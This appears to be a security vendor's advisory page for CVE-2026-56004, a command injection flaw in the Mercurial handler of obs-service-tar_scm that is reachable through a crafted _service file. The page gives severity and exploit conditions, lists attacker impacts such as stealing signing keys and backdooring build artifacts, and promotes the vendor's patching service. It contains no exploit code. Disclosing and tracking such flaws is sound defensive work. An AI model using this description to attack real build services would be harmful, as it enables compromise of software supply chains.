HarborGuardharborguardDatabase
Back to search
CRITICALCVE-2026-56004Published Modified CNA suse

CVE-2026-56004: obs-service-tar_scm: command injection via mercurial handler

A shellcode injection in the mercurial handler of the obs tar_scm source service before version 0.12.4 could be used by attackers able to provide a _service file to execute code as the source service or the local user checking out the malicious services

Metrics

CVSS v3.1
10.0
Severity
CRITICAL
Fixed in
0.12.4
Affected Products
1

Get notified

Email me when this CVE is updated: new fix versions, severity changes, or any record change.

HarborGuard Analysis

Synopsis

A command injection vulnerability exists in the Mercurial handler of obs-service-tar_scm, part of the openSUSE Build Service source service infrastructure, before version 0.12.4. The flaw is reachable over the network with no authentication required and no victim interaction needed, making it trivially exploitable by any attacker who can supply a crafted _service file. Successful exploitation gives the attacker full code execution as the source service process or the local user running the checkout, with complete read, write, and availability impact across the service scope. A patched-image rebuild at version 0.12.4 is available on HarborGuard for environments running an affected version.

HarborGuard Coverage

Detection

Detection of CVE-2026-56004 is available across every HarborGuard environment; the CVE is ingested from upstream feeds within minutes of publication and matched against all customer images in connected registries and CI pipelines, including custom-built images that bundle obs-service-tar_scm. Coverage applies regardless of whether the affected package was installed from an upstream base layer or added during a custom build step.

Available
Triage

HarborGuard triage for this CVE applies the CVSS v3.1 score of 10.0 (Critical) and weights it against each customer organization's compliance policy to determine urgency and routing. Alerts are directed to the appropriate team inbox within the customer org based on configured ownership rules for the affected image or workload.

Available
Patch

A patched-image rebuild at obs-service-tar_scm version 0.12.4 is available on HarborGuard for any environment where an affected image is detected. For customers who opt into auto-remediation, HarborGuard can trigger a rebuild, run regression tests against the updated image, and open a pull request against affected workloads automatically.

Available

Exploit Conditions

  • Network reachabilityRequired

    The vulnerable service is exposed over the network; an attacker must be able to deliver a crafted _service file to the target build service endpoint to trigger the injection.

  • AuthenticationNot required

    No credentials are needed; any attacker who can submit a _service file to the build service can exploit this vulnerability without holding an account.

  • Victim interactionNot required

    No user action is required beyond the build service processing the attacker-supplied _service file as part of its normal operation.

  • Attack complexityDetail

    Attack complexity is low; the exploit is reliable and requires no special conditions, race timing, or knowledge of memory layout.

Blast Radius

  • The attacker executes arbitrary shell commands as the obs-service-tar_scm process, gaining a foothold inside the build service runtime environment.
  • Full confidentiality impact means the attacker reads any files, credentials, or source code accessible to the service user, including signing keys or repository secrets stored on the host.
  • Full integrity impact means the attacker modifies build outputs, injects backdoors into source archives, or tampers with artifacts before they are published downstream.
  • Full availability impact means the attacker crashes or permanently disrupts the build service, blocking all dependent package builds and CI pipelines that rely on it.

How HarborGuard Handles This

Available on HarborGuard: detection for CVE-2026-56004 is active across all connected registries and pipelines the moment the CVE was published, with images matched against the affected version range of obs-service-tar_scm (below 0.12.4). Because this is a Critical severity issue with a CVSS score of 10.0, it is prioritized at the top of triage queues under any standard compliance policy. A rebuilt image at version 0.12.4 is available for affected environments. For customers who opt into auto-remediation, HarborGuard initiates a rebuild at the fix version, executes a regression test run against the new image, and opens a pull request against affected workloads; median time from CVE publication to merged patch PR for critical-severity issues is around 90 minutes for environments with auto-remediation enabled. Where compliance policy or environment constraints prevent auto-remediation, HarborGuard surfaces the finding with remediation guidance and the exact fix version so engineering teams can act manually.

See how HarborGuard automates this

Fix available

0.12.4
Patch commits
Affected packages
  • openSUSE / buildservice
    < 0.12.4 (from 0)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
References